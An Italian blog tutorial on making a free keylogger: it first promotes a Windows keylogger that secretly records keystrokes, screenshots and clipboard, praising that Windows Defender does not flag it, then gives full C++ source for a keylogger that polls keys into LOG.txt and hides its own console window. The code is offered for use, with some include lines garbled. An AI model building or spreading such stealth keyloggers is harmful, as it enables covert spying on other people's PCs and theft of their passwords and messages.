Guide e Tutorials

Come creare un keylogger gratis

Un Keylogger è uno strumento software in grado di tracciare tutto quello che viene fatto sulla tastiera del proprio o di un altro PC. Creare un Keylogger non è una cosa semplice: occorre essere degli sviluppatori oppure avere una buona conoscenza dei linguaggi di programmazione e dei software usati per compilare i programmi.

Se ti trovi in questa pagina e sei alla ricerca di un Keylogger gratis da usare per tracciare e monitorare il tuo PC, allora ti consigliamo di leggere la prima parte dell’articolo. Se invece sei un utente avanzato con conoscenze informatiche puoi dare un’occhiata alla seconda parte dell’articolo.

Keylogger gratis per PC

PC Task Logger, questo è il nome di un ottimo Keylogger per Windows. E’ disponibile in una versione totalmente gratuita e il suo utilizzo è davvero banale.

Per iniziare scarica e installa PC Task Logger dal sito ufficiale: https://pctaskmonitor.myblogres.com/

A differenza di altri keylogger che potresti trovare in rete, PC Task Logger  è forse l’unico che non viene rilevato come potenzialmente dannoso o come virus da parte di Windows Defender. Questo semplifica sicuramente l’installazione e l’uso del programma sul tuo PC, senza blocchi o avvisi da parte degli antivirus.

Ecco l’interfaccia del programma:

Come puoi notare dalla figura sopra, PC Task Logger consente di tracciare 3 tipologie di dati:

  1. Keystrokes, cioè tasti digitati sulla tastiera del PC
  2. Screenshots, cioè vengono fatte delle foto al desktop (di nascosto ovviamente) per capire precisamente quello che viene fatto sul computer
  3. Clipboard, cioè tutti gli appunti che vengono copiati durante l’uso del PC

Queste informazioni, tutte insieme, consentono di capire in modo preciso e dettagliato tutte le attività che sono state fatte sul PC in tua assenza, oppure da parte dei tuoi bambini. E’ uno strumento molto utile sia per la tua sicurezza che in ambito di controllo parentale.

Creare un Keylogger (per sviluppatori)

Ecco passo dopo passo una guida che vi aiuterà a fare un keylogger in C++ con dev-c++ ,  può anche essere fatto in CodeGear C++ Builder, Visual Studio e simili.

Come installare DevC + + ed eseguire.

1) Scaricare Dev C++ ed installalo.

2) Avviare Dev C++, fare clic su File-> New-> Project

3) Scegliere progetto vuoto, il nome del tipo di progetto ad esempio MyKeylogger e selezionare progetto C++.

4) clicca sul tasto destro del mouse sul nome del progetto e fare clic su File Nuovo.

dopo questo apparirà campo in cui si deve digitare il codice, fare clic per eseguire codice su Esegui-> Compila & Esegui o premere F9.

Come fare un Keylogger in Dev C + +

Aprire Keylogger.cpp e scrivere questo in esso.

CODICE
#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();

Fai una funzione main. (La funzione main sarà la prima che verrà eseguita.)

CODICE
int main()
{
Stealth();
char i;while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,”LOG.txt”);
}
}
system (“PAUSE”);
return 0;
}

In base a tale scriveremo il nostro keylogger

CODICE
int Save (int key_stroke, char *file);
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%­s”, “[BACKSPACE]”);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%­s”, “\n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%­s”, ” “);
else if (key_stroke == VK_TAB) //VK
fprintf(OUTPUT_FILE, “%­s”, “[TAB]”);
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%­s”, “[SHIFT]”);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%­s”, “[CONTROL]”);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%­s”, “[ESCAPE]”);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%­s”, “[END]”);
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, “%­s”, “[HOME]”);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%­s”, “[LEFT]”);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%­s”, “[UP]”);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%­s”, “[RIGHT]”);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%­s”, “[DOWN]”);
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%­s”, “.”);
else
fprintf(OUTPUT_FILE, “%­s”, &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

Ora andiamo ad aggiungere Stealth ad esso.
Sotto l’ultimo codice aggiungete di nuovo

CODICE
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}

Tutto qui, hai scritto il tuo primo keylogger

Codice completo:

CODICE
#include
using namespace std;
#include
#includeint Save (int key_stroke, char *file);
void Stealth();int main()
{
Stealth();
char i;while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,”LOG.txt”);
}
}
system (“PAUSE”);
return 0;
}/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%­s”, “[BACKSPACE]”);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%­s”, “\n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%­s”, ” “);
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, “%­s”, “[TAB]”);
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%­s”, “[SHIFT]”);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%­s”, “[CONTROL]”);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%­s”, “[ESCAPE]”);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%­s”, “[END]”);
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, “%­s”, “[HOME]”);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%­s”, “[LEFT]”);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%­s”, “[UP]”);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%­s”, “[RIGHT]”);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%­s”, “[DOWN]”);
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%­s”, “.”);
else
fprintf(OUTPUT_FILE, “%­s”, &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}

2 thoughts on “Come creare un keylogger gratis

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *